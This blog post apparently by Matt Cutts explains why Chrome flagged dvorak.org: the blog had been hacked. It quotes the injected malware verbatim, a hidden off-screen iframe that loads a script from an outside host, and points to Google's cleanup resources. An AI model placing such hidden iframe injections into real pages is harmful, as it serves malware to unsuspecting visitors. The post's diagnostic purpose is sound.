Recently someone on twitter complained that Chrome was labeling their site as malware:

http://Dvorak.org site blocked by Chrome browser after I wrote negative commentary about Google.

I took a few minutes to compose a reply, so I’ll go ahead and post it here:

Just to summarize: Chrome’s warning is correct. Your blog is hacked and injecting a malicious iframe on dvorak.org/blog/ even on error pages. At the top of the page, the malicious iframe looks like this: <style>.rrfhezo { position:absolute; left:-1012px; top:-681px; }</style> <div class=”rrfhezo”><iframe src=”hxxp://cnsycrdv.organiccrap.com/jquery/get.php?ver=jquery.latest.js” width=”420″ height=”475″></iframe> I would recommend taking your blog down until you can fix the hack and remove the malware. If you verify dvorak.org at http://google.com/webmasters/ then we’ll show you the details we know about the malicious code. We’re just the messenger here–this definitely had nothing to do with anything you wrote about Google. In fact, we recently published a website to help site owners recover from a hacked site: http://www.google.com/webmasters/hacked/ Getting hacked truly sucks though. I hope you’re able to get things cleaned up and in good shape. When you think the site is clean, you can file an appeal at http://google.com/webmasters for your hacked site and we’ll rescan it for malware. When it’s clean, we’ll remove the warning in Chrome. Hope that helps,

Matt Cutts

I hope no one reading this ever gets hacked, but the truth is that some people will. You can reduce the odds of getting hacked by keeping all of your web server software up to date. If you do get hacked, our site at http://www.google.com/webmasters/hacked/ will walk you through the process of cleaning up your site. I know that some site owners are annoyed when Google flags their site as hacked or serving malware, but we’re trying to protect our users as best we can.